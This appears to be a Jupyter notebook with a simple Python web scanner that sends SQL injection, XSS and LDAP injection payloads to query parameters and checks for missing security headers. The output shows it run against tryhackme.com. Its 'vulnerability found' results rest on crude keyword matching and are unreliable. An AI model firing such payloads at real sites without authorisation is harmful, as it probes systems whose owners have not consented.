In [4]:
url = "https://www.hackthebox.com/"

In [5]:
import requests

def scan_target(url):
    print(f"Scanning target: {url}")
    try:
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            print("Target reachable!")
        else:
            print("Failed to reach the target.")
    except requests.RequestException as e:
        print("Error:", e)


In [6]:
def test_sql_injection(url):
    sql_payloads = ["' OR '1'='1", "' UNION SELECT NULL--", "' OR 1=1 --"]
    for payload in sql_payloads:
        test_url = f"{url}?id={payload}"
        try:
            response = requests.get(test_url, timeout=5)
            if "error" in response.text.lower() or "syntax" in response.text.lower():
                print(f"Possible SQL Injection vulnerability found at {test_url}")
        except requests.RequestException as e:
            print("Error:", e)


In [7]:
def test_xss(url):
    xss_payloads = ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>"]
    for payload in xss_payloads:
        test_url = f"{url}?search={payload}"
        try:
            response = requests.get(test_url, timeout=5)
            if payload in response.text:
                print(f"Possible XSS vulnerability found at {test_url}")
        except requests.RequestException as e:
            print("Error:", e)


In [8]:
def check_security_headers(url):
    headers_to_check = ["Content-Security-Policy", "X-Content-Type-Options", "Strict-Transport-Security"]
    try:
        response = requests.get(url, timeout=5)
        for header in headers_to_check:
            if header not in response.headers:
                print(f"Missing security header: {header}")
    except requests.RequestException as e:
        print("Error:", e)


In [9]:
def run_vulnerability_scan(url):
    print("Starting vulnerability scan...")
    scan_target(url)
    test_sql_injection(url)
    test_xss(url)
    check_security_headers(url)
    print("Vulnerability scan complete.")


In [11]:
if __name__ == "__main__":
    target_url = input("Enter the target URL: ")
    run_vulnerability_scan(target_url)



Enter the target URL:  https://tryhackme.com/


Starting vulnerability scan...
Scanning target: https://tryhackme.com/
Target reachable!
Possible SQL Injection vulnerability found at https://tryhackme.com/?id=' OR '1'='1
Possible SQL Injection vulnerability found at https://tryhackme.com/?id=' UNION SELECT NULL--
Possible SQL Injection vulnerability found at https://tryhackme.com/?id=' OR 1=1 --
Missing security header: Content-Security-Policy
Missing security header: X-Content-Type-Options
Missing security header: Strict-Transport-Security
Vulnerability scan complete.


In [15]:
import requests
from bs4 import BeautifulSoup
from reportlab.lib.pagesizes import letter
from reportlab.pdfgen import canvas
from urllib.parse import urlparse

# Define payloads for testing vulnerabilities
sql_injection_payloads = [
    "' OR '1'='1",
    "' UNION SELECT NULL--",
    "' OR 1=1 --"
]
xss_payloads = [
    "<script>alert('XSS')</script>",
    "\"><img src=x onerror=alert(1)>",
    "<svg/onload=alert('XSS')>"
]
ldap_payloads = [
    "*", 
    ")(|(user=*))", 
    ")(password=*)"
]
flagged_keywords = ["malware", "attack", "breach", "phishing"]

# Step 1: Fetch metadata from a URL
def fetch_metadata(url):
    try:
        response = requests.get(url)
        response.raise_for_status()
        soup = BeautifulSoup(response.text, "html.parser")
        title = soup.title.string if soup.title else "No title"
        description_tag = soup.find("meta", attrs={"name": "description"})
        description = description_tag["content"] if description_tag else "No description"
        keywords_tag = soup.find("meta", attrs={"name": "keywords"})
        keywords = keywords_tag["content"] if keywords_tag else "N/A"
        return {"title": title, "description": description, "keywords": keywords}
    except requests.exceptions.RequestException as e:
        print(f"Error fetching URL: {e}")
        return None

# Step 2: Analyze metadata for flagged keywords
def analyze_data(metadata):
    if not metadata:
        return []
    flags = [kw for kw in flagged_keywords if kw in metadata["description"].lower()]
    return flags

# Vulnerability checks
def test_sql_injection(url):
    print("Testing for SQL Injection vulnerabilities...")
    vulnerable = False
    for payload in sql_injection_payloads:
        params = {'id': payload}
        response = requests.get(url, params=params)
        if "error" in response.text.lower():
            print(f"Possible SQL Injection vulnerability found at {response.url} with payload: {payload}")
            vulnerable = True
    if not vulnerable:
        print("No SQL Injection vulnerabilities found.")

def test_xss(url):
    print("Testing for XSS vulnerabilities...")
    vulnerable = False
    for payload in xss_payloads:
        params = {'search': payload}
        response = requests.get(url, params=params)
        if payload in response.text:
            print(f"Possible XSS vulnerability found at {response.url} with payload: {payload}")
            vulnerable = True
    if not vulnerable:
        print("No XSS vulnerabilities found.")

def test_ldap_injection(url):
    print("Testing for LDAP Injection vulnerabilities...")
    vulnerable = False
    for payload in ldap_payloads:
        params = {'username': payload}
        response = requests.get(url, params=params)
        if "error" in response.text.lower() or "invalid" in response.text.lower():
            print(f"Possible LDAP Injection vulnerability found at {response.url} with payload: {payload}")
            vulnerable = True
    if not vulnerable:
        print("No LDAP Injection vulnerabilities found.")

def check_security_headers(url):
    print("Checking for missing security headers...")
    response = requests.get(url)
    missing_headers = []
    if 'Content-Security-Policy' not in response.headers:
        missing_headers.append('Content-Security-Policy')
    if 'X-Content-Type-Options' not in response.headers:
        missing_headers.append('X-Content-Type-Options')
    if 'Strict-Transport-Security' not in response.headers:
        missing_headers.append('Strict-Transport-Security')
    if missing_headers:
        print("Missing security headers:", ", ".join(missing_headers))
    else:
        print("All recommended security headers are present.")
    return missing_headers
    
# Main function
def scan_website(url):
    print(f"Starting scan on target: {url}")
    metadata = fetch_metadata(url)
    flagged_keywords = analyze_data(metadata)
    sql_vulnerable = test_sql_injection(url)
    xss_vulnerable = test_xss(url)
    ldap_vulnerable = test_ldap_injection(url)
    missing_headers = check_security_headers(url)
    parsed_url = urlparse(url)


# Example URL to test
target_url = "https://tryhackme.com/"  # Replace with a real URL
scan_website(target_url)


Starting scan on target: https://tryhackme.com/
Testing for SQL Injection vulnerabilities...
Possible SQL Injection vulnerability found at https://tryhackme.com/?id=%27+OR+%271%27%3D%271 with payload: ' OR '1'='1
Possible SQL Injection vulnerability found at https://tryhackme.com/?id=%27+UNION+SELECT+NULL-- with payload: ' UNION SELECT NULL--
Possible SQL Injection vulnerability found at https://tryhackme.com/?id=%27+OR+1%3D1+-- with payload: ' OR 1=1 --
Testing for XSS vulnerabilities...
No XSS vulnerabilities found.
Testing for LDAP Injection vulnerabilities...
Possible LDAP Injection vulnerability found at https://tryhackme.com/?username=%2A with payload: *
Possible LDAP Injection vulnerability found at https://tryhackme.com/?username=%29%28%7C%28user%3D%2A%29%29 with payload: )(|(user=*))
Possible LDAP Injection vulnerability found at https://tryhackme.com/?username=%29%28password%3D%2A%29 with payload: )(password=*)
Checking for missing security headers...
Missing security headers